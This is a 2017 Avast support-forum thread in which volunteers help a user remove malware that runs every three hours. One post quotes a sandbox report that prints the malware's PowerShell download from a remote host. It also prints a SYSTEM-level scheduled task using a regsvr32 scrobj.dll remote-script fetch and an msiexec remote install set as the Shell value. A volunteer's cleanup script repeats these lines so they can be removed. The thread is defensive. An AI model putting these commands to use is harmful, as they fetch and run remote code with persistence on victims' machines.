URL: Mal Infection, need help immediately!

system · 2017-04-12T16:36:00.000Z

Since yesterday, my Avast is blocking an url but dont remove it, first,my Avast blocked an url at 1:20pm called:http//point.rwmdqsj.com, and 3 hours later at 4:01pm an url called http//point.lotusiloveyou.com i scanned my pc 6 times and i used the Malwarebytes AdwCleaner but nothing, it happens in a break of 3 hours, like 2:01 pm, 5:01 pm, 8:01 pm, the exactly minute. how can i remove?

Eddy · 2017-04-12T16:38:03.000Z

Follow the instructions > https://forum.avast.com/index.php?topic=194892.0

Pondus · 2017-04-12T18:14:26.000Z

Posting a screenshot of avast popup warnings so we can see all info given would help

system · 2017-04-12T19:39:12.000Z

here is the image, i dunno if it is a false positive, this same url is being blocked in a break of 3 hours

DavidR · 2017-04-12T20:24:55.000Z

It doesn’t seem to be a false positive and the process trying to connect regsvr32.exe is highly suspect if it is connecting to the internet.

You need to follow the advice given in Reply #1 and post (attach) the logs so they can be analysed.

system · 2017-04-12T21:03:51.000Z

well i really dunno, there is a post of a guy with the same problem, i will try this but i wanna solve it fast because i use this pc for work and etc, i already contacted a friend 2 minutes ago and he was with the same thing bro. is this anything with the browser? —> https://forum.avast.com/index.php?topic=200615.0

Pondus · 2017-04-12T21:13:57.000Z

can you upload regsvr32.exe to www.virustotal.com and test it

if you see it as tested before, click rescan for a fresh report. Post link to scan result here

system · 2017-04-12T21:16:16.000Z

Okay, you can see my log that is named mbam.txt that i posted now

Pondus · 2017-04-12T21:19:58.000Z

mericanman004 post:8:

Okay, you can see my log that is named mbam.txt that i posted now

we can see it, but the two FRST diagnostic logs are the most important

system · 2017-04-12T21:41:41.000Z

Okay, here we are, see my FRST, Addition, mbam below. there are the results

DavidR · 2017-04-12T21:47:10.000Z

As I said in the other topic you posted in:

DavidR:

I don't see any benefit in trying to upload the regsvr32.exe to virustotal clean or infected won't effect the removal process.
This file may possibly be clean but being used by a hidden or undetected piece of malware, we have seen this before in these types of URL:Mal before and invariably it requires a malware removal specialist to analyse the logs.

These malware removal specialists are volunteers and may be in a different time zone to you, so there may be a delay.

system · 2017-04-12T21:51:51.000Z

Yes, but what could be?

DavidR · 2017-04-12T22:03:08.000Z

mericanman004 post:12:

Yes, but what could be?

As I said a “hidden or undetected” piece of malware, other than that we avast users can’t say. The malware removal specialists have to analyse the logs to see the underlying cause.

system · 2017-04-13T03:35:27.000Z

I have the same problem, and I just was just digging on the internet and found this:

https://www.reverse.it/sample/7d76d5b481208886acdb03894200d29014a84caa35cefc2e6f946eb609c33d47?environmentId=100

by the way, i don’t regularly use forums and don’t know the rules and how it works

but, going on…

on reverse.it they got this MSI2985.tmp.dll thing, that appears to call the powershell and make somes downloads

Analysed 16 processes in total (System Resource Monitor).

RunDLL “C:\MSI2985.tmp.dll” (PID: 2684)
rundll32.exe “C:\MSI2985.tmp.dll”,AdWork (PID: 3312)
powershell.exe $client = new-object System.Net.WebClient;$client.DownloadFile(‘http://point.suibianzaimai.com/nealcf?memca=zDlkPGZir3h4mXQyZXRpw2tuzaI8N2YyNdVaZS84MdNaE2JaZixhE3Rpr249meRaZi4x’,'%TEMP%\sD037.tmp’) (PID: 3204)
schtasks.exe schtasks /Create /SC HOURLY /MO 3 /ST 08:28:00 /TN “PowerWord-SCT-JT” /TR “regsvr32.exe /s /i:http://point.lotusiloveyou.com/?data=zDlkPGZir3h4mXQyZXRpw2tuzaI8N2YyNdVaZS84MdNaE2JaZq== scrobj.dll” /RU “SYSTEM” /F /RL HIGHEST (PID: 3264)

Eddy · 2017-04-13T06:33:14.000Z

mericanman004,

what is KMS doing on your system ?

system · 2017-04-13T12:10:08.000Z

Did you mean, autoKMS?

Eddy · 2017-04-13T12:21:01.000Z

Yes.

system · 2017-04-13T12:33:24.000Z

Well , i bought this pc gamer from a physical store with the office, probably they cracked the office.

And i found this while reading the FRST: HKU\S-1-5-21-2097341823-3435128210-3467763070-1000.…\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPDQkEGRhnANcOTHcGdzkMTqyMWHcOWw5MF== /q

Is this the thing that avast is blocking? i mean the first infection was while i was watching some youtube videos then poped up Avast with an url and the process was: C:\Windows\System32\msiexec.exe
then after 1 hour the thing started.

dbrisendine · 2017-04-14T07:50:30.000Z

Open notepad by pressing the Windows Key + R Key, typing in Notepad in the Run dialog and then pressing Enter. Please copy the contents of the Code box below. To do this highlight the contents of the box by clicking [Select] next to Code: , then right click on any of the highlighted text and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txt



Start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Run: [eagleget_setup] => C:\Users\Biel\AppData\Local\Temp\is-KE1NB.tmp\eagleget_setup.tmp -V <===== ATENÇÃO
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPDQkEGRhnANcOTHcGdzkMTqyMWHcOWw5MF== /q
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\MountPoints2: F - F:\Lenovo_Suite.exe
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\MountPoints2: {9836347d-9e45-11e6-bc16-08626698bb3b} - F:\Lenovo_Suite.exe
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\MountPoints2: {b740cf12-9ef6-11e6-a699-08626698bb3b} - F:\setup.exe
IFEO\taskmgr.exe: [Debugger] 
Task: {F25384BB-8849-45DD-B245-BD44248D3F50} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPDQkEGRhnANcOTHcGdzkMTqyMWHcOWw5MF== scrobj.dll
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10]
AlternateDataStreams: C:\Windows\System32:04D38F5E_Cef.gbp [2]
AlternateDataStreams: C:\Windows\Temp:$DATA [16]
AlternateDataStreams: C:\Windows\system32\Drivers\wsddfac.sys:X5ZN8aGXs4 [0]
AlternateDataStreams: C:\ProgramData\GbPlugin:IncompleteStartGbprcm.cnt [10]
AlternateDataStreams: C:\Users\Todos os Usuários\GbPlugin:IncompleteStartGbprcm.cnt [10]
cmd: ipconfig /flushdns
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state on
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
CMD: bitsadmin /reset /allusers
RemoveProxy:
EmptyTemp:
Reboot:
end

NOTE. It’s important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 by right clicking on the FRST64.exe file, selecting “Run as Administrator…”. The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.

The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show nothing (meaning there is no update found) and you can continue on. Press the Fix button just once and wait. The tool will create a restore point, process the script and ask for a restart of your system.

http://i1351.photobucket.com/albums/p785/dbreeze2/just%20stuff/Press%20the%20FIX%20button_zpsdd5zi3mt.png

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished FRST will generate a log on the Desktop (Fixlog.txt). Please attach it to your reply post. Also, tell me how your system is running now.

Staticguy · 2017-04-14T11:15:26.000Z

mericanman004 post:18:

Well , i bought this pc gamer from a physical store with the office, probably they cracked the office.

And i found this while reading the FRST: HKU\S-1-5-21-2097341823-3435128210-3467763070-1000.…\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPDQkEGRhnANcOTHcGdzkMTqyMWHcOWw5MF== /q

Is this the thing that avast is blocking? i mean the first infection was while i was watching some youtube videos then poped up Avast with an url and the process was: C:\Windows\System32\msiexec.exe
then after 1 hour the thing started.

@mericanman004: Just in case you don’t know about KMS. You might have this detection called HackTool.KMS. KMS is also known as HackTool.KMS is a name of a Windows cracking tool used to make Windows operating system appear as though it’s a legitimate/genuine copy. This may also include Office software. I had this freaking thing installed in my previous laptop (Acer) which i had it only for 3 and a half month (December 2016-Last week of the last month March 2017). MBAM detected this tool and it automatically deleted it. Later I found out that (from store) they put the wrong copy of Windows 10. Windows 10 Enterprise and not Home for upgrading from HDD to SSD. It got sent back 3 times at Acer service center for this problem and also other random problems and like hard disk failing, screen flickering, and etc and finally they refund my money and I got a brand new laptop 2 weeks ago.

You might have to closely monitor your computer for any issues and problems and also you might have to refund your money back.

Announcements